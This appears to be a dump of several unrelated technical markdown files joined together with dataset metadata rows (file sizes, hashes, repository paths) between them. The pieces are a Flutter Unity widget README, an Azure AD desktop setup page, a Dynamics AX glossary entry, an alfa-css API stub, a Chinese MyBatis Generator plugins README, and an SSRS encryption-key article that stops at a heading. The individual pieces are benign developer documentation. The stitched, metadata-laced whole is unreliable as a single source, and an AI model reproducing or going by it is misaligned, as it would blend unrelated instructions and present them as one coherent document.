[![PRs Welcome][prs-badge]](http://makeapullrequest.com)
[![Watch on GitHub][github-watch-badge]][github-watch]
[![Star on GitHub][github-star-badge]][github-star]
[](https://gitter.im/flutter-unity/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)
Flutter unity 3D widget for embedding unity in flutter. Now you can make awesome gamified features of your app in Unity and get it rendered in a Flutter app both in fullscreen and embeddable mode. Works great on Android and iOS. There are now two unity app examples in the unity folder, one with the default scene and another based on Unity AR foundation samples.
<br />
<br />
Note: I have updated the example for Unity 2019.3.5, and there are some new changes in the scripts folder. Please replace the files and folders you previously copied into your Unity project.
## Installation
First depend on the library by adding this to your packages `pubspec.yaml`:
```yaml
dependencies:
flutter_unity_widget: ^0.1.6+8
```
Now inside your Dart code you can import it.
```dart
import 'package:flutter_unity_widget/flutter_unity_widget.dart';
```
<br />
## Preview
30 fps gifs, showcasing communication between Flutter and Unity:


<br />
## Setup Project
For this, there is also a video tutorial, which you can find [here](https://www.youtube.com/watch?v=exNPmv_7--Q).
### Add Unity Project
1. Create an unity project, Example: 'UnityDemoApp'.
2. Create a folder named `unity` in flutter project folder.
2. Move unity project folder to `unity` folder.
Now your project files should look like this.
```
.
├── android
├── ios
├── lib
├── test
├── unity
│ └── <Your Unity Project> // Example: UnityDemoApp
├── pubspec.yml
├── README.md
```
### Configure Player Settings
1. First Open Unity Project.
2. Click Menu: File => Build Settings
Be sure you have at least one scene added to your build.
3. => Player Settings
**Android Platform**:
1. Make sure your `Graphics APIs` are set to OpenGLES3 with a fallback to OpenGLES2 (no Vulkan)
2. Change `Scripting Backend` to IL2CPP.
3. Mark the following `Target Architectures` :
- ARMv7 ✅
- ARM64 ✅
   - x86 ✅ (In Unity version 2019.2+, this feature is not available due to the lack of official Unity support)
<img src="https://raw.githubusercontent.com/snowballdigital/flutter-unity-view-widget/master/Screenshot%202019-03-27%2007.31.55.png" width="400" />
**iOS Platform**:
1. This only works with Unity version >= 2019.3, because it uses Unity as a library!
2. Depending on where you want to test or run your app (simulator or physical device), select the appropriate SDK under `Target SDK`.
<br />
<br />
### Add Unity Build Scripts and Export
Copy [`Build.cs`](https://github.com/snowballdigital/flutter-unity-view-widget/tree/master/scripts/unity_2019_3_5_later/Editor/Build.cs) and [`XCodePostBuild.cs`](https://github.com/snowballdigital/flutter-unity-view-widget/tree/master/scripts/unity_2019_3_5_later/Editor/XCodePostBuild.cs) to `unity/<Your Unity Project>/Assets/Scripts/Editor/`
Open your unity project in Unity Editor. Now you can export the Unity project with `Flutter/Export Android` (for Unity versions up to 2019.2), `Flutter/Export Android (Unity 2019.3.*)` (for Unity versions 2019.3 and up, which uses the new [Unity as a Library](https://blogs.unity3d.com/2019/06/17/add-features-powered-by-unity-to-native-mobile-apps/) export format), or `Flutter/Export IOS` menu.
<img src="https://github.com/snowballdigital/flutter-unity-view-widget/blob/master/Screenshot%202019-03-27%2008.13.08.png?raw=true" width="400" />
Android will export unity project to `android/UnityExport`.
IOS will export unity project to `ios/UnityExport`.
<br />
**Android Platform Only**
1. After exporting the Unity game, open Android Studio and add the `Unity Classes` Java `.jar` file as a module to the Unity project. You only need to do this once if you export from the same version of Unity every time. The `.jar` file is located in the ```<Your Flutter Project>/android/UnityExport/lib``` folder.
2. Add the following to your ```<Your Flutter Project>/android/settings.gradle```file:
```gradle
include ":UnityExport"
project(":UnityExport").projectDir = file("./UnityExport")
```
3. If using Unity 2019.2 or older, open `build.gradle` of `UnityExport` module and replace the dependencies with
```gradle
dependencies {
implementation project(':unity-classes') // the unity classes module you added from step 1
}
```
4. To build a release package, you need to add a signing config in `UnityExport/build.gradle`. The code below uses the `debug` signingConfig for all buildTypes; you can change this if you need to specify a different signingConfig.
```
buildTypes {
release {
signingConfig signingConfigs.debug
}
debug {
signingConfig signingConfigs.debug
}
profile{
signingConfig signingConfigs.debug
}
innerTest {
//...
matchingFallbacks = ['debug', 'release']
}
}
```
5. If you find duplicate app icons on your launcher after installing the app, open the `UnityExport` manifest file and comment out the code below:
```gradle
<activity android:name="com.unity3d.player.UnityPlayerActivity" android:theme="@style/UnityThemeSelector" android:screenOrientation="fullSensor" android:launchMode="singleTask" android:configChanges="mcc|mnc|locale|touchscreen|keyboard|keyboardHidden|navigation|orientation|screenLayout|uiMode|screenSize|smallestScreenSize|fontScale|layoutDirection|density" android:hardwareAccelerated="false">
// <intent-filter>
// <action android:name="android.intent.action.MAIN" />
// <category android:name="android.intent.category.LAUNCHER" />
// <category android:name="android.intent.category.LEANBACK_LAUNCHER" />
// </intent-filter>
<meta-data android:name="unityplayer.UnityActivity" android:value="true" />
</activity>
```
**iOS Platform Only**
1. Open your ios/Runner.xcworkspace (the workspace, not the project!) in Xcode and add the exported project to the workspace root (right-click in the Navigator, not on an item -> Add Files to “Runner” -> add the UnityExport/Unity-Iphone.xcodeproj file).
<img src="workspace.png" width="400" />
2. Select the Unity-iPhone/Data folder and change the Target Membership for the Data folder to UnityFramework.
<img src="change_target_membership_data_folder.png" width="400" />
3. Add this to your Runner/Runner/Runner-Bridging-Header.h
```c
#import "UnityUtils.h"
```
4. Add to Runner/Runner/AppDelegate.swift before the GeneratedPluginRegistrant call:
```swift
InitArgs(CommandLine.argc, CommandLine.unsafeArgv)
```
Or when using Objective-C your `main.m` should look like this:
```
#import "UnityUtils.h"
int main(int argc, char * argv[]) {
@autoreleasepool {
InitArgs(argc, argv);
return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
}
}
```
5. Opt-in to the embedded views preview by adding a boolean property to the app's `Info.plist` file with the key `io.flutter.embedded_views_preview` and the value `YES`.
6. Add UnityFramework.framework as a Library to the Runner project
<img src="libraries.png" width="400" />
<br />
### AR Foundation ( requires Unity 2019.3.*)

Check out the Unity AR Foundation Samples [Demo Repository](https://github.com/juicycleff/flutter-unity-arkit-demo)
**The Demo Repository is not guaranteed to be up-to-date with the latest flutter-unity-view-widget master. Make sure to follow the steps listed below for setting up AR Foundation on iOS and Android in your projects.**
**iOS**
Go to target info list on Xcode and add this key and value;
key: `Privacy - Camera Usage Description` value: `$(PRODUCT_NAME) uses Cameras`
**Android**
If you want to use Unity for integrating Augmented Reality in your Flutter app, a few more changes are required:
1. Export the Unity Project as previously stated (using the Editor Build script).
2. Check if the exported project includes all required Unity library (.so) files (`lib/\<architecture\>/libUnityARCore.so` and `libarpresto_api.so`). There seems to be a bug where a Unity export does not include all lib files. If they are missing, use Unity to build a standalone .apk of your AR project, unzip the resulting apk, and copy the missing .so files over to the `UnityExport` module.
3. Similar to how you've created the `unity-classes` module in Android Studio, create similar modules for all exported .aar and .jar files in the `UnityExport/libs` folder (`arcore_client.aar`, `unityandroidpermissions.aar`, `UnityARCore.aar`).
4. Update the build.gradle script of the `UnityExport` module to depend on the new modules (again, similar to how it depends on `unity-classes`).
5. Finally, update your Dart code build method where you include the `UnityWidget` and add `isARScene: true,`.
Sadly, this does have the side effect of making your Flutter activity act in full screen, as Unity requires control of your Activity for running in AR, and it makes several modifications to your Activity as a result (including setting it to full screen).
### Add UnityMessageManager Support
Copy [`UnityMessageManager.cs`](https://github.com/snowballdigital/flutter-unity-view-widget/tree/master/scripts/unity_2019_3_5_later/UnityMessageManager.cs) to your unity project.
Copy this folder [`JsonDotNet`](https://github.com/snowballdigital/flutter-unity-view-widget/tree/master/scripts/unity_2019_3_5_later/JsonDotNet) to your unity project.
Copy [`link.xml`](https://github.com/snowballdigital/flutter-unity-view-widget/tree/master/scripts/unity_2019_3_5_later/link.xml) to your unity project.
(2019.3.5* only) Copy this folder [`Plugins`](https://github.com/snowballdigital/flutter-unity-view-widget/tree/master/scripts/unity_2019_3_5_later/Plugins) to your unity project.
<br />
### Vuforia
**Android**
Similar to setting up AR Foundation, but creating a module for the VuforiaWrapper instead.
Thanks to [@PiotrxKolasinski](https://github.com/PiotrxKolasinski) for writing down the exact steps:
1. Change in build.gradle: `implementation(name: 'VuforiaWrapper', ext:'aar')` to `implementation project(':VuforiaWrapper')`
2. In settings.gradle in the first line at the end add: `':VuforiaWrapper'`
3. From the menu: File -> New -> New Module, choose "Import .JAR/.AAR Package" and add the VuforiaWrapper.aar lib. Move the generated folder to android/
4. In Widget UnityWidget add field: `isARScene: true`
5. Your app needs camera permission (you can set this in the settings on the device)
## Examples
### Simple Example
```dart
import 'package:flutter/material.dart';
import 'package:flutter_unity_widget/flutter_unity_widget.dart';

class UnityDemoScreen extends StatefulWidget {
  UnityDemoScreen({Key key}) : super(key: key);

  @override
  _UnityDemoScreenState createState() => _UnityDemoScreenState();
}

class _UnityDemoScreenState extends State<UnityDemoScreen> {
  static final GlobalKey<ScaffoldState> _scaffoldKey =
      GlobalKey<ScaffoldState>();
  UnityWidgetController _unityWidgetController;

  @override
  Widget build(BuildContext context) {
    return Scaffold(
      key: _scaffoldKey,
      body: SafeArea(
        bottom: false,
        child: WillPopScope(
          // Prevent the Android back button from popping this page.
          onWillPop: () async => false,
          child: Container(
            color: Colors.yellow,
            child: UnityWidget(
              onUnityViewCreated: onUnityCreated,
            ),
          ),
        ),
      ),
    );
  }

  // Callback that connects the created controller to the unity controller
  void onUnityCreated(controller) {
    this._unityWidgetController = controller;
  }
}
```
<br />
### Communicating with and from Unity
```dart
import 'package:flutter/material.dart';
import 'package:flutter_unity_widget/flutter_unity_widget.dart';
void main() => runApp(MyApp());
class MyApp extends StatefulWidget {
@override
_MyAppState createState() => _MyAppState();
}
class _MyAppState extends State<MyApp> {
static final GlobalKey<ScaffoldState> _scaffoldKey =
GlobalKey<ScaffoldState>();
UnityWidgetController _unityWidgetController;
double _sliderValue = 0.0;
@override
void initState() {
super.initState();
}
@override
Widget build(BuildContext context) {
return MaterialApp(
home: Scaffold(
key: _scaffoldKey,
appBar: AppBar(
title: const Text('Unity Flutter Demo'),
),
body: Card(
margin: const EdgeInsets.all(8),
clipBehavior: Clip.antiAlias,
shape: RoundedRectangleBorder(
borderRadius: BorderRadius.circular(20.0),
),
child: Stack(
children: <Widget>[
UnityWidget(
onUnityViewCreated: onUnityCreated,
isARScene: false,
onUnityMessage: onUnityMessage,
),
Positioned(
bottom: 20,
left: 20,
right: 20,
child: Card(
elevation: 10,
child: Column(
children: <Widget>[
Padding(
padding: const EdgeInsets.only(top: 20),
child: Text("Rotation speed:"),
),
Slider(
onChanged: (value) {
setState(() {
_sliderValue = value;
});
setRotationSpeed(value.toString());
},
value: _sliderValue,
min: 0,
max: 20,
),
],
),
),
),
],
),
),
),
);
}
  // Communication from Flutter to Unity
void setRotationSpeed(String speed) {
_unityWidgetController.postMessage(
'Cube',
'SetRotationSpeed',
speed,
);
}
// Communication from Unity to Flutter
void onUnityMessage(controller, message) {
print('Received message from unity: ${message.toString()}');
}
// Callback that connects the created controller to the unity controller
void onUnityCreated(controller) {
this._unityWidgetController = controller;
}
}
```
## API
- `pause()` (Use this to pause unity player)
- `resume()` (Use this to resume unity player)
- `postMessage(String gameObject, methodName, message)` (Allows you invoke commands in Unity from flutter)
- `onUnityMessage(data)` (Unity to flutter bindding and listener)
## Known issues
- Android Export requires several manual changes
- Using AR will make the activity run in full screen (hiding status and navigation bar).
[version-badge]: https://img.shields.io/pub/v/flutter_unity_widget.svg?style=flat-square
[package]: https://pub.dartlang.org/packages/flutter_unity_widget/
[license-badge]: https://img.shields.io/github/license/snowballdigital/flutter-unity-view-widget.svg?style=flat-square
[license]: https://github.com/snowballdigital/flutter-unity-view-widget/blob/master/LICENSE
[prs-badge]: https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square
[prs]: http://makeapullrequest.com
[github-watch-badge]: https://img.shields.io/github/watchers/snowballdigital/flutter-unity-view-widget.svg?style=social
[github-watch]: https://github.com/snowballdigital/flutter-unity-view-widget/watchers
[github-star-badge]: https://img.shields.io/github/stars/snowballdigital/flutter-unity-view-widget.svg?style=social
[github-star]: https://github.com/snowballdigital/flutter-unity-view-widget/stargazers
## Contributors ✨
Thanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)):
<!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section -->
<!-- prettier-ignore-start -->
<!-- markdownlint-disable -->
<table>
<tr>
<td align="center"><a href="https://www.xraph.com"><img src="https://avatars2.githubusercontent.com/u/11243590?v=4" width="100px;" alt="Rex Raphael"/><br /><sub><b>Rex Raphael</b></sub></a><br /><a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=juicycleff" title="Code">💻</a> <a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=juicycleff" title="Documentation">📖</a> <a href="#question-juicycleff" title="Answering Questions">💬</a> <a href="https://github.com/snowballdigital/flutter-unity-view-widget/issues?q=author%3Ajuicycleff" title="Bug reports">🐛</a> <a href="#review-juicycleff" title="Reviewed Pull Requests">👀</a> <a href="#tutorial-juicycleff" title="Tutorials">✅</a></td>
<td align="center"><a href="https://stockxit.com"><img src="https://avatars1.githubusercontent.com/u/1475368?v=4" width="100px;" alt="Thomas Stockx"/><br /><sub><b>Thomas Stockx</b></sub></a><br /><a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=thomas-stockx" title="Code">💻</a> <a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=thomas-stockx" title="Documentation">📖</a> <a href="#question-thomas-stockx" title="Answering Questions">💬</a> <a href="#tutorial-thomas-stockx" title="Tutorials">✅</a></td>
<td align="center"><a href="http://krispypen.github.io/"><img src="https://avatars1.githubusercontent.com/u/156955?v=4" width="100px;" alt="Kris Pypen"/><br /><sub><b>Kris Pypen</b></sub></a><br /><a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=krispypen" title="Code">💻</a> <a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=krispypen" title="Documentation">📖</a> <a href="#question-krispypen" title="Answering Questions">💬</a> <a href="#tutorial-krispypen" title="Tutorials">✅</a></td>
<td align="center"><a href="https://github.com/lorant-csonka-planorama"><img src="https://avatars2.githubusercontent.com/u/48209860?v=4" width="100px;" alt="Lorant Csonka"/><br /><sub><b>Lorant Csonka</b></sub></a><br /><a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=lorant-csonka-planorama" title="Documentation">📖</a> <a href="#video-lorant-csonka-planorama" title="Videos">📹</a></td>
</tr>
</table>
<!-- markdownlint-enable -->
<!-- prettier-ignore-end -->
<!-- ALL-CONTRIBUTORS-LIST:END -->
This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome!
| 45.357477 | 756 | 0.702931 | eng_Latn | 0.632029 |
61b70dea7e134fc272997fc9471df49578e898c9 | 993 | md | Markdown | articles/active-directory/develop/GuidedSetups/active-directory-mobileanddesktopapp-windowsdesktop-configure-arp.md | quique-z/azure-docs | b0cd9cf3857bef92a706920f4435fe698dd28bcf | [
"CC-BY-4.0",
"MIT"
] | 2 | 2021-09-19T19:07:44.000Z | 2021-11-15T09:58:47.000Z | articles/active-directory/develop/GuidedSetups/active-directory-mobileanddesktopapp-windowsdesktop-configure-arp.md | quique-z/azure-docs | b0cd9cf3857bef92a706920f4435fe698dd28bcf | [
"CC-BY-4.0",
"MIT"
] | 1 | 2017-04-21T17:57:59.000Z | 2017-04-21T17:58:30.000Z | articles/active-directory/develop/GuidedSetups/active-directory-mobileanddesktopapp-windowsdesktop-configure-arp.md | quique-z/azure-docs | b0cd9cf3857bef92a706920f4435fe698dd28bcf | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-08-20T00:51:14.000Z | 2020-08-20T00:51:14.000Z | ---
title: Azure AD v2 Windows Desktop Getting Started - Config | Microsoft Docs
description: How a Windows Desktop .NET (XAML) application can get an access token and call an API protected by Azure Active Directory v2 endpoint.
services: active-directory
documentationcenter: dev-center-name
author: andretms
manager: CelesteDG
editor: ''
ms.assetid: 820acdb7-d316-4c3b-8de9-79df48ba3b06
ms.service: active-directory
ms.subservice: develop
ms.devlang: na
ms.topic: conceptual
ms.tgt_pltfrm: na
ms.workload: identity
ms.date: 01/29/2020
ms.author: ryanwi
ms.custom: aaddev
---
# Add the application’s registration information to your app
In this step, you need to add the Application Id to your project.
1. Open `App.xaml.cs` and replace the line containing the `ClientId` with:
```csharp
private static string ClientId = "[Enter the application Id here]";
```
### What is Next
[!INCLUDE [Test and Validate](../../../../includes/active-directory-develop-guidedsetup-windesktop-test.md)]
| 29.205882 | 147 | 0.766365 | eng_Latn | 0.87098 |
61b71ef3ed526cd58068b5f6629b6a9bc67f14e1 | 770 | md | Markdown | dynamicsax2012-technet/exceptional-threshold.md | RobinARH/DynamicsAX2012-technet | d0d0ef979705b68e6a8406736612e9fc3c74c871 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | dynamicsax2012-technet/exceptional-threshold.md | RobinARH/DynamicsAX2012-technet | d0d0ef979705b68e6a8406736612e9fc3c74c871 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | dynamicsax2012-technet/exceptional-threshold.md | RobinARH/DynamicsAX2012-technet | d0d0ef979705b68e6a8406736612e9fc3c74c871 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: " exceptional threshold"
TOCTitle: " exceptional threshold"
ms:assetid: DynamicsAXGlossary.2014269
ms:mtpsurl: https://technet.microsoft.com/en-us/library/dynamicsaxglossary.2014269(v=AX.60)
ms:contentKeyID: 62830105
ms.date: 08/25/2014
mtps_version: v=AX.60
f1_keywords:
- Glossary.exceptional threshold
---
# exceptional threshold
The maximum limit of an individual transaction value that is a part of a cumulative transaction value, up to which a tax on the transaction value is not calculated. The exceptional threshold is applied to an individual transaction value that is a part of a cumulative transaction value that is within the cumulative threshold.
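As a hypothetical illustration (not part of Dynamics AX), the rule can be sketched in code: while the running cumulative total is still within the cumulative threshold, an individual transaction valued at or below the exceptional threshold is not taxed.

```python
def is_taxable(txn_value, cumulative_total, exceptional_threshold, cumulative_threshold):
    """Illustrative helper only — not a Dynamics AX API.

    While the cumulative total is within the cumulative threshold,
    an individual transaction up to the exceptional threshold is
    exempt from tax; larger transactions are taxed.
    """
    within_cumulative = cumulative_total <= cumulative_threshold
    if within_cumulative and txn_value <= exceptional_threshold:
        return False
    return True

# With a 10,000 cumulative threshold and a 1,000 exceptional threshold:
print(is_taxable(800, 5_000, 1_000, 10_000))    # → False (exempt: below both limits)
print(is_taxable(1_500, 5_000, 1_000, 10_000))  # → True (exceeds the exceptional threshold)
```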
## See also
[Microsoft Dynamics AX glossary](glossary/microsoft-dynamics-ax-glossary.md)
| 32.083333 | 326 | 0.797403 | eng_Latn | 0.951249 |
61b75500f3fb4f193f4361dd94d09fcd776dc63f | 353 | md | Markdown | docs/api/alfa-css.token_namespace.isstring_variable.md | Siteimprove/alfa | 3eb032275a9fa5f3b97b892e28ebfc90eb4ef611 | [
"MIT"
] | 70 | 2018-05-25T16:02:23.000Z | 2022-03-21T14:28:03.000Z | docs/api/alfa-css.token_namespace.isstring_variable.md | Siteimprove/alfa | 3eb032275a9fa5f3b97b892e28ebfc90eb4ef611 | [
"MIT"
] | 448 | 2018-06-01T08:46:47.000Z | 2022-03-31T14:02:55.000Z | docs/api/alfa-css.token_namespace.isstring_variable.md | Siteimprove/alfa | 3eb032275a9fa5f3b97b892e28ebfc90eb4ef611 | [
"MIT"
] | 13 | 2018-07-04T19:47:49.000Z | 2022-02-19T09:59:34.000Z | <!-- Do not edit this file. It is automatically generated by API Documenter. -->
[Home](./index.md) > [@siteimprove/alfa-css](./alfa-css.md) > [Token](./alfa-css.token_namespace.md) > [isString](./alfa-css.token_namespace.isstring_variable.md)
## Token.isString variable
<b>Signature:</b>
```typescript
isString: typeof String.isString
```
| 29.416667 | 171 | 0.708215 | eng_Latn | 0.349953 |
61b760fcc028744f73e6fb0519194d30925ba78a | 2,375 | md | Markdown | README.md | mask-zpt/mybatis-generator-plugins | 8e1c002c8282a3209f549d3e4602be4259c84547 | [
"BSD-3-Clause"
] | null | null | null | README.md | mask-zpt/mybatis-generator-plugins | 8e1c002c8282a3209f549d3e4602be4259c84547 | [
"BSD-3-Clause"
] | null | null | null | README.md | mask-zpt/mybatis-generator-plugins | 8e1c002c8282a3209f549d3e4602be4259c84547 | [
"BSD-3-Clause"
] | 1 | 2021-01-29T07:59:15.000Z | 2021-01-29T07:59:15.000Z | # myBatisGeneratorPlugins
A collection of MyBatis Generator extension plugins.
#### Implemented features
- Automatically add Swagger2 annotations to entity classes
- Extend setter methods to return the `this` instance, enabling convenient method chaining
#### Maven dependency
```xml
<!-- https://mvnrepository.com/artifact/com.github.misterchangray.mybatis.generator.plugins/myBatisGeneratorPlugins -->
<dependency>
<groupId>com.github.misterchangray.mybatis.generator.plugins</groupId>
<artifactId>myBatisGeneratorPlugins</artifactId>
<version>1.2</version>
</dependency>
```
-----------------------------------------------
### Details
#### 1. Automatically add Swagger2 annotations to entity classes
Automatically generates Swagger2 documentation annotations for `entity` classes; the annotation text is taken from the database column `comment`.
``` xml
<!-- automatically generate swagger2 docs for entities -->
<plugin type="mybatis.generator.plugins.GeneratorSwagger2Doc">
<property name="apiModelAnnotationPackage" value="io.swagger.annotations.ApiModel" />
<property name="apiModelPropertyAnnotationPackage" value="io.swagger.annotations.ApiModelProperty" />
</plugin>
```
#### 2. Extend the entity `set` methods
Extends the entity `set` methods to return the current `this` instance, enabling convenient method chaining.
``` xml
<!-- extend the entity set methods -->
<plugin type="mybatis.generator.plugins.ExtendEntitySetter" />
```
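The chained setters this plugin generates let you write `new User().setName("ray").setAge(30)` in Java. The pattern — each setter assigns its field and then returns the instance — can be sketched as follows (a Python illustration of the idea; `User` and its fields are hypothetical, and the plugin's real output is Java code):

```python
class User:
    """Hypothetical entity illustrating the fluent-setter pattern."""

    def __init__(self):
        self.name = None
        self.age = None

    def set_name(self, name):
        self.name = name
        return self  # returning the instance is what enables chaining

    def set_age(self, age):
        self.age = age
        return self

u = User().set_name("ray").set_age(30)
print(u.name, u.age)  # → ray 30
```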
-------------------------------------------------
#### How to add it to your project
Add the dependency under the mybatis-generator plugin node in your pom.xml, like this:
``` xml
<!-- maven -->
<build>
<finalName>common-core</finalName>
<!-- ... -->
<plugins>
<!--mybatis 逆向工程插件-->
<plugin>
<groupId>org.mybatis.generator</groupId>
<artifactId>mybatis-generator-maven-plugin</artifactId>
<version>1.3.5</version>
<configuration>
<verbose>true</verbose>
<overwrite>true</overwrite>
</configuration>
<dependencies>
<!-- use plugin -->
<!-- https://mvnrepository.com/artifact/com.github.misterchangray.mybatis.generator.plugins/myBatisGeneratorPlugins -->
<dependency>
<groupId>com.github.misterchangray.mybatis.generator.plugins</groupId>
<artifactId>myBatisGeneratorPlugins</artifactId>
<version>1.2</version>
</dependency>
</dependencies>
</plugin>
</plugins>
</build>
```
-------------------------------------
#### runtime environment
- OS Microsoft Windows 10 Pro
- Java 8
- springMVC 4.3
- Mybatis 3.4
- Mysql 5.5.50
- Restful interface
- Maven 3.5.3
- Git 2.14.1
- Swagger 2.6.1
| 26.388889 | 129 | 0.617684 | yue_Hant | 0.227719 |
61b7e0719fd9f1a8fd700dcea5db266634d91c18 | 1,702 | md | Markdown | docs/framework/unmanaged-api/debugging/icorpublish-interface.md | mtorreao/docs.pt-br | e080cd3335f777fcb1349fb28bf527e379c81e17 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/unmanaged-api/debugging/icorpublish-interface.md | mtorreao/docs.pt-br | e080cd3335f777fcb1349fb28bf527e379c81e17 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/unmanaged-api/debugging/icorpublish-interface.md | mtorreao/docs.pt-br | e080cd3335f777fcb1349fb28bf527e379c81e17 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Interface ICorPublish
ms.date: 03/30/2017
api_name:
- ICorPublish
api_location:
- mscordbi.dll
api_type:
- COM
f1_keywords:
- ICorPublish
helpviewer_keywords:
- ICorPublish interface [.NET Framework debugging]
ms.assetid: 87c4fcb2-7703-4a2e-afb6-42973381b960
topic_type:
- apiref
ms.openlocfilehash: 3ff4efe8b3e2932da7f65246bf4ad614a4dd86cd
ms.sourcegitcommit: d8020797a6657d0fbbdff362b80300815f682f94
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 11/24/2020
ms.locfileid: "95694393"
---
# <a name="icorpublish-interface"></a>ICorPublish Interface
Serves as the general interface for publishing information about processes and about the application domains within those processes.
## <a name="methods"></a>Methods
|Method|Description|
|------------|-----------------|
|[EnumProcesses Method](icorpublish-enumprocesses-method.md)|Gets an instance of [ICorPublishProcessEnum](icorpublishprocessenum-interface.md) that contains the managed processes running on this computer.|
|[GetProcess Method](icorpublish-getprocess-method.md)|Gets an instance of [ICorPublishProcess](icorpublishprocess-interface.md) that represents the process with the specified identifier.|
## <a name="requirements"></a>Requirements
**Platforms:** See [System Requirements](../../get-started/system-requirements.md).
**Header:** CorPub.idl, CorPub.h
**Library:** CorGuids.lib
**.NET Framework Versions:** [!INCLUDE[net_current_v10plus](../../../../includes/net-current-v10plus-md.md)]
## <a name="see-also"></a>See also
- [Debugging Interfaces](debugging-interfaces.md)
- [CorpubPublish Coclass](corpubpublish-coclass.md)
| 34.734694 | 214 | 0.754994 | por_Latn | 0.606144 |
61b7e669edcb507f429872feebea59e469ec854b | 8,592 | md | Markdown | docs/reporting-services/install-windows/ssrs-encryption-keys-delete-and-re-create-encryption-keys.md | cawrites/sql-docs | 58158eda0aa0d7f87f9d958ae349a14c0ba8a209 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-05-07T19:40:49.000Z | 2020-09-19T00:57:12.000Z | docs/reporting-services/install-windows/ssrs-encryption-keys-delete-and-re-create-encryption-keys.md | cawrites/sql-docs | 58158eda0aa0d7f87f9d958ae349a14c0ba8a209 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/reporting-services/install-windows/ssrs-encryption-keys-delete-and-re-create-encryption-keys.md | cawrites/sql-docs | 58158eda0aa0d7f87f9d958ae349a14c0ba8a209 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-03-11T20:30:39.000Z | 2020-05-07T19:40:49.000Z | ---
title: "Delete and Recreate Encryption Keys (Configuration Manager) | Microsoft Docs"
description: "Deleting and recreating encryption keys are activities that fall outside of routine encryption key maintenance."
ms.date: 12/04/2019
ms.prod: reporting-services
ms.prod_service: "reporting-services-native"
ms.custom: seo-lt-2019, seo-mmd-2019
ms.topic: conceptual
helpviewer_keywords:
- "recreating encryption keys"
- "encryption keys [Reporting Services]"
- "deleting encryption keys"
- "symmetric keys [Reporting Services]"
- "removing encryption keys"
- "resetting encryption keys"
ms.assetid: 201afe5f-acc9-4a37-b5ec-121dc7df2a61
author: maggiesMSFT
ms.author: maggies
---
# Delete and Recreate Encryption Keys (SSRS Configuration Manager)
Deleting and recreating encryption keys are activities that fall outside of routine encryption key maintenance. You perform these tasks in response to a specific threat to your report server, or as a last resort when you can no longer access a report server database.
- Recreate the symmetric key when you believe the existing symmetric key is compromised. You can also recreate the key on a regular basis as a security best practice.
- Delete existing encryption keys and unusable encrypted content when you cannot restore the symmetric key.
## Recreating Encryption Keys
If you have evidence that the symmetric key is known to unauthorized users, or if your report server has been under attack and you want to reset the symmetric key as a precaution, you can recreate the symmetric key. When you recreate the symmetric key, all encrypted values will be re-encrypted using the new value. If you are running multiple report servers in a scale-out deployment, all copies of the symmetric key will be updated to the new value. The report server uses the public keys available to it to update the symmetric key for each server in the deployment.
You can only recreate the symmetric key when the report server is in a working state. Recreating the encryption keys and re-encrypting content disrupts server operations. You must take the server offline while re-encryption is underway. There should be no requests made to the report server during re-encryption.
You can use the Reporting Services Configuration tool or the **rskeymgmt** utility to reset the symmetric key and encrypted data. For more information about how the symmetric key is created, see [Initialize a Report Server (SSRS Configuration Manager)](../../reporting-services/install-windows/ssrs-encryption-keys-initialize-a-report-server.md).
### How to recreate encryption keys (Reporting Services Configuration Tool)
1. Disable the Report Server Web service and HTTP access by modifying the **IsWebServiceEnabled** property in the rsreportserver.config file. This step temporarily stops authentication requests from being sent to the report server without completely shutting down the server. You must have minimal service so that you can recreate the keys.
If you are recreating encryption keys for a report server scale-out deployment, disable this property on all instances in the deployment.
1. Open Windows Explorer and navigate to *drive*:\Program Files\Microsoft SQL Server\\*report_server_instance*\Reporting Services. Replace *drive* with your drive letter and *report_server_instance* with the folder name that corresponds to the report server instance for which you want to disable the Web service and HTTP access. For example, C:\Program Files\Microsoft SQL Server\MSRS10_50.MSSQLSERVER\Reporting Services.
2. Open the rsreportserver.config file.
3. For the **IsWebServiceEnabled** property, specify **False**, and then save your changes.
2. Start the Reporting Services Configuration tool, and then connect to the report server instance you want to configure.
3. On the Encryption Keys page, click **Change**. [!INCLUDE[clickOK](../../includes/clickok-md.md)]
4. Restart the Report Server Windows service. If you are recreating encryption keys for a scale-out deployment, restart the service on all instances.
5. Re-enable the Web service and HTTP access by modifying the **IsWebServiceEnabled** property in the rsreportserver.config file. Do this for all instances if you are working with a scale out deployment.
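Step 1 above edits rsreportserver.config by hand. For orientation, the relevant fragment looks roughly like the following sketch; the exact nesting and sibling elements vary by SQL Server version, so treat this as illustrative rather than a literal copy of the file:

```xml
<Configuration>
  <Service>
    <!-- Set to False to stop Web service and HTTP access during re-encryption -->
    <IsWebServiceEnabled>False</IsWebServiceEnabled>
  </Service>
</Configuration>
```

Restore the value to `True` in step 5 once the keys have been recreated.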
### How to recreate encryption keys (rskeymgmt)
1. Disable the Report Server Web service and HTTP access. Use the instructions in the previous procedure to stop Web service operations.
2. Run **rskeymgmt.exe** locally on the computer that hosts the report server. Use the **-s** argument to reset the symmetric key. No other arguments are required:
```
rskeymgmt -s
```
3. Restart the Reporting Services Windows service.
## Deleting Unusable Encrypted Content
